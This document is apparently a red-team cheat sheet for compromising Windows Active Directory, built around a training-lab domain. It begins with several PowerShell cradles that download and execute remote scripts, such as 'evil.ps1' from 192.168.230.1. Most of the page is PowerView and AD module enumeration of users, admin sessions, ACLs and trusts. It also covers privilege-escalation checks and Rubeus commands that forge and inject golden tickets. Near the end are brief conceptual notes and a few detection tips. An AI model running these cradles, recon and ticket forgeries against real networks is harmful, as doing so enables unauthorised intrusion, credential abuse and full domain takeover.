Red Team:

#Load Powershell script
.C:\script.ps1

#Import module or script
Import-Module C:\script.ps1

#List all commands in module
Get-Command -Module modulename

#Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

#PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')
$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

#Download execute cradle
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

---- Recon ----

#Get domain
Get-ADDomain

#Get object of another domain
Get-Domain -Domain moneycorp.local (Powerview)
Get-ADDomain -Identity moneycorp.local (AD Module)

#Get domain SID for the current domain
Get-DomainSID (Powerview)
(Get-ADDomain).DomainSID (AD Module)

#Get domain policy for the current domain
Get-DomainPolicyData
(Get-DomainPolicyData).systemaccess

#Get domain policy for another domain
(Get-DomainPolicyData -domain
moneycorp.local).systemaccess

#Get domain controllers for the current domain
Get-DomainController
Get-ADDomainController

#Get domain controllers for another domain
Get-DomainController -Domain moneycorp.local
Get-ADDomainController -DomainName moneycorp.local -
Discover

#Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity student1
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *
Get-ADUser -Filter * -Properties * | select name,MemberOf | fl *

#Get list of all properties for users in the current domain
Get-DomainUser -Identity student1 -Properties *
Get-DomainUser -Properties samaccountname,logonCount
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,logoncount,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}


#Search for a particular string in a user's attributes:
Get-DomainUser -LDAPFilter "Description=*built*" | Select name,Description

Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description

#Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "*Server 2022*"
Get-DomainComputer -Ping

Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2022*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * | select name, DistinguishedName
Get-ADComputer -Filter * -Properties * | select name,logonCount
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}

#Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain <targetdomain>
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *

#Get all groups containing the word "admin" in group name
Get-DomainGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

#Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-ADGroupMember -Identity "Domain Admins" -Recursive

#Get the group membership for a user:
Get-DomainGroup -UserName "student1"
Get-ADPrincipalGroupMembership -Identity student1

#List all the local groups on a machine (needs administrator privs on non-dc
#machines) :
Get-NetLocalGroup -ComputerName dcorp-dc

#Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines) :
Get-NetLocalGroupMember -ComputerName dcorp-dc -GroupName Administrators

#Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName dcorp-adminsrv

#Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName dcorp-adminsrv

#Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName dcorp-adminsrv

#Find shares on hosts in current domain.
Invoke-ShareFinder -Verbose

#Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

#Get all fileservers of the domain
Get-NetFileServer

#Get list of GPO in current domain.
Get-DomainGPO
Get-DomainGPO -ComputerIdentity dcorp-student1

#Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

#Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-student1

#Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity student1 -Verbose

#Get OUs in a domain
Get-DomainOU
Get-ADOrganizationalUnit -Filter * -Properties *

#Get GPO applied on an OU. Read GPOname from gplink attribute from
Get-NetOU
Get-DomainGPO -Identity "{0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E}"

#Get the ACLs associated with the specified object
Get-DomainObjectAcl -SamAccountName student1 -ResolveGUIDs

#Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose

#We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access

#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student1" -and}

#Get the ACLs associated with the specified path
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"

#Get a list of all domain trusts for the current domain
Get-DomainTrust
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local

Get-ADTrust
Get-ADTrust -Identity us.dollarcorp.moneycorp.local

#Get details about the current forest
Get-Forest
Get-Forest -Forest eurocorp.local

Get-ADForest
Get-ADForest -Identity eurocorp.local

#Get all domains in the current forest
Get-ForestDomain
Get-ForestDomain -Forest eurocorp.local
(Get-ADForest).Domains

#External Trusts:
Get-ForestDomain -Forest eurocorp.local | %(Get-DomainTrust -Domain $_.Name)
Get-ForestDomain | %(Get-DomainTrust -Domain $_.Name) | ?{$_.TrustAttributes -eq "FILTER_SIDS"

#Get all global catalogs for the current forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest eurocorp.local
Get-ADForest | select -ExpandProperty GlobalCatalogs

#Map trusts of a forest (no Forest trusts in the lab)
Get-ForestTrust
Get-ForestTrust -Forest eurocorp.local
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

#Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose

#Find computers where a domain admin (or specified user/group) has sessions:
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"

#Find computers where a domain admin (or specified user/group) has sessions:
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"


#Find computers where a domain admin session is available and current user has admin access (uses Test-AdminAccess).
Find-DomainUserLocation -CheckAccess

#Find computers (File Servers and Distributed File servers) where a domain admin session is available.
Find-DomainUserLocation -Stealth

#List sessions on remote machines (https://github.com/Leo4j/Invoke-SessionHunter) Command doesn’t need admin access on remote machines. Uses Remote Registry and queries HKEY_USERS hive.
Invoke-SessionHunter -FailSafe

#An opsec friendly command would be
Invoke-SessionHunter -NoPortScan -Targets C:\AD\Tools\servers.txt


#Get services with unquoted paths and a space in their name.
Get-ServiceUnquoted -Verbose

#Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

#Get the services whose configuration current user can modify.
Get-ModifiableService -Verbose

#PowerUp
Invoke-AllChecks

#Privesc:
Invoke-PrivEsc

#PEASS-ng:
winPEASx64.exe


---- Rubeus -----

#Forge TGT with golden ticket:
Rubeus.exe golden /aes256:asdasd /user:nlamb /domain:dasda /sid:2357301523 /nowrap

#Inject forged TGT into process (Only creates type 9 logon):
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

Evasion:

Mimikatz:

Forged TGTs have a default max age of 10 years.

Active Directory:

Enterprise Admins only appear in the root forest.
- Enterprise Admin group have complete control of the entire forest (all the domains in the forest) where as the Domain Admins have access only to their specific domain.

Pass the hash and Over pass the hash:

Process

Explanation

Winlogon

Windows Logon Process

Schannell

Secure connection such as SSL, TLS

IKE

Internet Key Exchange protocol process

Secondary Logon Service

(runas)- SecLogo

Advapi

Web-based logon: IIS logon

PKU2U

User-2-User Public Key Cryptograph

Kerberos

Ticket-based, for secure nodes communication over non-secure network, domain

NtLmSsp

NT Lan Manager Hash-based – used locally

Overpass the hash:

Uses an NTLM hash to grab kerberous ticket.

Will sometimes result in RC4 TGT being requested if TA doesn't specify where encryption type.
4624 – An account was successfully logged on. (Logon type = 9 Logon Process = Seclogo)

ACLs:

Access Control List (ACL)

It is a list of Access Control Entries (ACE) - ACE corresponds to individual permission or audits access. Who has permission and what can be done on an object?

Two types: –

DACL - Defines the permissions trustees (a user or group) have on an object.
- Discretionary Access Control List
SACL - Logs success and failure audit messages when an object is accessed.
- system access control list

ACLs are vital to security architecture of AD.

ACE:

An ACE is an access control entry in an access control list (ACL)

AdminSDHolder:

Sanitization group that will clean/overwrite the ACLs of protected groups (Domain Admins) to protect the group.
- Cleans hourly.

Trusts:

Default/Automatic Trusts

Parent-child trust:
- It is created automatically between the new domain and the domain that precedes it in the namespace hierarchy, whenever a new domain is added in a tree. For example, dollarcorp.moneycorp.local is a child of moneycorp.local
- This trust is always two-way transitive.
Tree-root trust:
- It is created automatically between whenever a new domain tree is added to a forest root.
- This trust is always two-way transitive.

Forrest trusts:

Non-transitive
Forest 1 can access forest 2, but cannot access forest 3.

External trusts:

Non-transitive:
Z can access B and C, but not A.

User Hunting:

Remote registry:

Enabled by default on servers and does not require local admin to enumerate the HKCU for user presence.
If remote registry service is disabled, it will not start up when queried.

PowerView:

Find-LocalAdminAccess can create a lot of 4624s on the DC and be used for detections.
Hunting for large amount of 4624s or 4625s on the DC from one user can be indicative of user scanning.

PreviousCheat Sheet NextWindows Event Logs

Last updated 5 months ago